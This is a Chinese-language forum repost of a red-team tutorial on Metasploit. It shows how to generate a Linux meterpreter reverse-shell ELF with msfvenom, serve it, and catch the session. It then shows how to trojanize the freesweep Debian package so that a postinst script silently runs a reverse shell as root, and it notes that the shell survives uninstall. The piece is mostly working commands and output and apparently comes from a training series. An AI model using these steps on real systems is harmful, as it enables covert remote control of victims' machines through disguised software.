论坛 › 运维.售后 › 红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获

温锦文欧普厨电及净水器总代理 发表于 2024-12-12 13:34:28

红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获

https://i-blog.csdnimg.cn/direct/7082c65f8c854808a3cc834343a8599d.gif

   欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

    专栏跑道一


➡️网络空间安全——全栈前沿技术持续深入学习 

https://i-blog.csdnimg.cn/direct/67f4df3eb193446c94ac0f41b7f523fa.png
   
专栏跑道二


➡️ 24 Network Security -LJS 

https://i-blog.csdnimg.cn/direct/90c1d22fc5254f52bf9896c2671edfad.png​
https://i-blog.csdnimg.cn/direct/724e91f01bbc4e17864b130cf81db74b.png​ 
https://i-blog.csdnimg.cn/direct/b354f26fa5a141a9af122692f3a519f8.png​
    专栏跑道三


➡️ MYSQL REDIS Advance operation

https://i-blog.csdnimg.cn/direct/8fd93e63521b4287a8de332b99cf1786.png
    专栏跑道四


➡️HCIP；H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

https://i-blog.csdnimg.cn/direct/3e0f9840dd7440c986819ef3c9ddf38e.png​
    专栏跑道五


➡️RHCE-LJShttps://i-blog.csdnimg.cn/direct/58856247df744cd1a3e5ad7c6259330a.webp​

    专栏跑道六


➡️数据结构与算法[考研+现实工作应用+C程序设计]

https://i-blog.csdnimg.cn/direct/4d0f4deb48764890b68bc98b53f2ceed.png​
    专栏跑道七


➡️RHCSA-LJS

https://i-blog.csdnimg.cn/direct/53322bd2df734d7c95c3247ff386d0f6.png

https://i-blog.csdnimg.cn/direct/6925bcc063c9420da504e5bbd0fe1fe7.gif

上节回顾


   目录
欢迎各位彦祖与热巴畅游本人专栏与博客
你的三连是我最大的动力
以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
专栏跑道一
➡️网络空间安全——全栈前沿技术持续深入学习 
专栏跑道二
➡️ 24 Network Security -LJS 
专栏跑道三
➡️ MYSQL REDIS Advance operation
专栏跑道四
➡️HCIP；H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
专栏跑道五
➡️RHCE-LJS​编辑​
专栏跑道六
➡️数据结构与算法[考研+现实工作应用+C程序设计]
专栏跑道七
➡️RHCSA-LJS
上节回顾
1.实战-制作 Linux 恶意软件获取 shell
使用 msfvenom 生成 linux 可实行文件

参数增补详解：
开启 apache服务

MSF 设置监听[老样子4件套]
接着打开 centos 7.5 xuegod63 linux 虚拟机，新建一个终端：
下载后门
添加实行权限
实行程序
然后惊讶的发现MSF控制台已经建立Session喽
检察相关信息 
留意：
2.实战-制作恶意 deb 软件包来触发后门
制作恶意软件包使用--download-only 方式下载软件包不进行安装
将软件包移动到 root 目录
解压软件包到 free 目录
留意一下：
创建软件包信息目录
创建软件包的信息文件
增补一下：
创建 deb 软件包，安装后脚本文件，来加载后门
给脚本文件添加实行权限


构建新的 deb 安装包
​
新打开一个终端 CTRL+SHIFT+T，生成 MSF 监听
没什么好说的
​
打包
回到 MSF 控制台
​
末了卸载软件包
​
就算恶意软件包被卸载，payload 依旧正常运行。
​


https://i-blog.csdnimg.cn/direct/4564e43bf982495db922195c39f43d88.gif

1.实战-制作 Linux 恶意软件获取 shell

使用 msfvenom 生成 linux 可实行文件

┌──(root㉿kali-2024)-
└─# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod                                 
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 175 (iteration=0)
x64/xor chosen with final size 175
Payload size: 175 bytes
Final size of elf file: 295 bytes
Saved as: /var/www/html/xuegod
                               https://i-blog.csdnimg.cn/direct/99bc505918254f6f9e1486bfa9a20707.png

参数增补详解：
 

   

[*] --platform 指定 linux
[*] -f 指定 elf 即 linux 操作系统的可实行文件范例
[*] -b 去掉坏字符
开启 apache服务

┌──(root㉿kali-2024)-
└─# /etc/init.d/apache2 start
Starting apache2 (via systemctl): apache2.service.
https://i-blog.csdnimg.cn/direct/b8f6eeb5f4b64f56ad52fe9666308449.png


MSF 设置监听[老样子4件套]

msf6 exploit(multi/handler) > back
msf6 >use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) >set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
接着打开 centos 7.5 xuegod63 linux 虚拟机，新建一个终端：

   

[*] 下载后门
──(root㉿kali-2024)-
└─# wget http://192.168.1.53/xuegod
┌──(root㉿kali-2024)-
└─# ./xuegod

   

[*] 添加实行权限
┌──(root㉿kali-2024)-
└─# chmod +x xuegod
实行程序

┌──(root㉿kali-2024)-
└─# ./xuegod


https://i-blog.csdnimg.cn/direct/3a6b8ea2bc954e08b7fecef472b70204.gif
然后惊讶的发现MSF控制台已经建立Session喽

https://i-blog.csdnimg.cn/direct/23f51c16e06b4c19b92e94af1782b038.png
检察相关信息 

meterpreter > ifconfig https://i-blog.csdnimg.cn/direct/e377ae75fb0a4891a667bd2dd7e2050b.png

留意：

   

[*]退出 session 需要使用 quit 正常退出 session 否则会影响下次连接。
meterpreter > quit
https://i-blog.csdnimg.cn/direct/12c2b1c5c7d84d8b8344d11e9eb6f3cb.gif


2.实战-制作恶意 deb 软件包来触发后门


制作恶意软件包使用--download-only 方式下载软件包不进行安装

──(root㉿kali-2024)-
└─#apt --download-only install freesweep
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成               
下列软件包是自动安装的并且现在不需要了：
cpp-13 fonts-noto-color-emoji ibverbs-providers libboost-iostreams1.74.0
libboost-thread1.74.0 libcephfs2 libgfapi0 libgfrpc0 libgfxdr0 libglusterfs0 libibverbs1
libnsl-dev libpython3.11-dev librados2 librdmacm1 libtirpc-dev python3-lib2to3 python3.11-dev
samba-ad-provision samba-dsdb-modules samba-vfs-modules
使用'apt autoremove'来卸载它(它们)。
下列【新】软件包将被安装：
freesweep
升级了 0 个软件包，新安装了 1 个软件包，要卸载 0 个软件包，有 1798 个软件包未被升级。
需要下载 55.8 kB 的归档。
解压缩后会消耗 142 kB 的额外空间。
获取:1 http://kali.download/kali kali-rolling/main amd64 freesweep amd64 1.0.2-1
已下载 55.8 kB，耗时 1秒 (38.4 kB/s)
于“仅下载”模式中下载完毕
https://i-blog.csdnimg.cn/direct/39153950f35248078637b00bf86fac67.png

将软件包移动到 root 目录

┌──(root㉿kali-2024)-
└─#mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ~/
https://i-blog.csdnimg.cn/direct/993b841bb32d44f497a9befd7808287d.png
解压软件包到 free 目录

┌──(root㉿kali-2024)-
└─# cd ~               
         
┌──(root㉿kali-2024)-[~]
└─# dpkg -x freesweep_1.0.2-1_amd64.deb free
                                          
https://i-blog.csdnimg.cn/direct/4aa0a40075d14d8598117aa1f3537364.gif

留意一下：

   

[*]生成软件包时无论是 payload 的和软件包信息都需要选择可以或许在目标操作系统上实行的创建软件包信息目录
生成恶意代码到软件包源文件中
┌──(root㉿kali-2024)-[~]
└─#msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp
LHOST=192.168.1.53 LPORT=4444 -b "\x00" -i 10 -f elf -o /root/free/usr/games/freesweep_sources


参数详解：

msfvenom -a x64 \                  # 使用 64 位架构
    --platform linux \                # 目标平台为 Linux
    -p linux/x64/shell/reverse_tcp \# 使用反向 TCP Shell 载荷
    LHOST=192.168.1.53 \            # 设置攻击者的 IP 地址
    LPORT=4444 \                      # 设置攻击者的监听端口
    -b "\x00" \                     # 避免使用空字符（NULL 字符）
    -i 10 \                           # 设置载荷编码的迭代次数为 10
    -f elf \                        # 输出为 ELF 格式的文件
    -o /root/free/usr/games/freesweep_sources# 指定输出路径和文件名

创建软件包信息目录

┌──(root㉿kali-2024)-[~]
└─#mkdir free/DEBIAN && cd free/DEBIAN
                                              创建软件包的信息文件

增补一下：

   

[*] 为什么用 tee 而不是直接输出到文件？ tee 不仅将内容写入文件，还会将它显示在标准输出上（即终端），使得你可以看到你所写入的内容。直接使用 > 或 >> 大概无法显示文件内容。tee 适用于需要同时检察和写入文件的场景。
[*] 'EOF' 引号的作用： 使用单引号 'EOF' 表示不会进行变量更换。这是一个安全的做法，特别是当文本中大概含有特殊字符时。如果不希望更换变量或转义字符，就使用单引号；如果希望进行变量更换，可以去掉引号，直接使用 << EOF
┌──(root㉿kali-2024)-[~]
└─#tee /root/free/DEBIAN/control << 'EOF'
heredoc>
heredoc> Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.
EOF

Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep： is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.
https://i-blog.csdnimg.cn/direct/9b7a4ed9131b429d8274757a7ebaab4a.png
创建 deb 软件包，安装后脚本文件，来加载后门

┌──(root㉿kali-2024)-[~]
└─#tee /root/free/DEBIAN/postinst << 'EOF'
heredoc> #!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
https://i-blog.csdnimg.cn/direct/a32c63da9a144998b3d73f20f1bd4134.png
   

[*] sudo /usr/games/freesweep_sources
[*]& 是将实行的恶意代码/命令放到后台运行
给脚本文件添加实行权限

┌──(root㉿kali-2024)-[~]
└─#chmod 755 /root/free/DEBIAN/postinst https://i-blog.csdnimg.cn/direct/b6670b39b9ac45b6b3e22b6c3c5e76ab.png



构建新的 deb 安装包

┌──(root㉿kali-2024)-[~/free/DEBIAN]
└─# dpkg-deb --build /root/free/
dpkg-deb: 正在 '/root/free.deb' 中构建软件包 'freesweep'。 https://i-blog.csdnimg.cn/direct/68ee9a1d69934e3eb662484432ba394e.png

留意：
   会在当前目录下生成构建的软件包 freesweep.db ,我们当前的目录是~/free/DEBIAN
┌──(root㉿kali-2024)-[~/free/DEBIAN]
└─#ls /root/free.deb
/root/free.deb
               
https://i-blog.csdnimg.cn/direct/108ef15f75c144e7a4da4dde98ca8f50.gif
新打开一个终端 CTRL+SHIFT+T，生成 MSF 监听

┌──(root㉿kali-2024)-[~]
└─# msfconsole
Metasploit tip: Use the 'capture' plugin to start multiple
authentication-capturing and poisoning services
                                                
                                 ___          ____
                               ,-""   `.      < HONK >
                           ,'_   e )`-._ /----
                            /,' `-._<.===-'
                           //
                        /;
            _          /   ;
(`._    _.-"" ""--..__,'    |
<_`-""                     \
<`-                        :
   (__   <__.                  ;
   `-.   '-.__.      _.'    /
      \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
               | |`----.`.
               | |      \ `.
               ; |___      \-``
               \   --<
                  `.`.<
                  `-'



       =[ metasploit v6.3.55-dev                        ]
+ -- --=[ 2397 exploits - 1232 auxiliary - 422 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops         ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 >
没什么好说的

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
https://i-blog.csdnimg.cn/direct/0a9bcb00b7cd435abcd45290c523cf3f.png

   

[*] 最好是在 Kali 中实行如果再 XSHELL 中实行大概会导致窗口卡死
打包

dpkg -i free.deb   

# dpkg：用于管理Debian软件包的工具，-i：安装选项，free.deb：待安装的.deb包文件
回到 MSF 控制台

meterpreter > getuid https://i-blog.csdnimg.cn/direct/e16c2e4756e84a90a91983a747b1c953.png

末了卸载软件包

┌──(root㉿kali-2024)-[~]
└─# dpkg -r freesweep
(正在读取数据库 ... 系统当前共安装有 406336 个文件和目录。)
正在卸载 freesweep (1.0.2-1) ...
正在处理用于 man-db (2.12.0-3) 的触发器 ...
正在处理用于 hicolor-icon-theme (0.17-2) 的触发器 ...
正在处理用于 desktop-file-utils (0.27-1) 的触发器 ...
                                                       https://i-blog.csdnimg.cn/direct/bd87bf4f85314a2a90814b935c35999e.png

就算恶意软件包被卸载，payload 依旧正常运行。

meterpreter > pwd   

[*]exit 退出即可

https://i-blog.csdnimg.cn/direct/f48f6c5c8c4c4deeb0ef4860915e0710.gif

https://i-blog.csdnimg.cn/direct/ec296943668244dd84cef6d21c966b2f.gif

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

查看完整版本: 红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获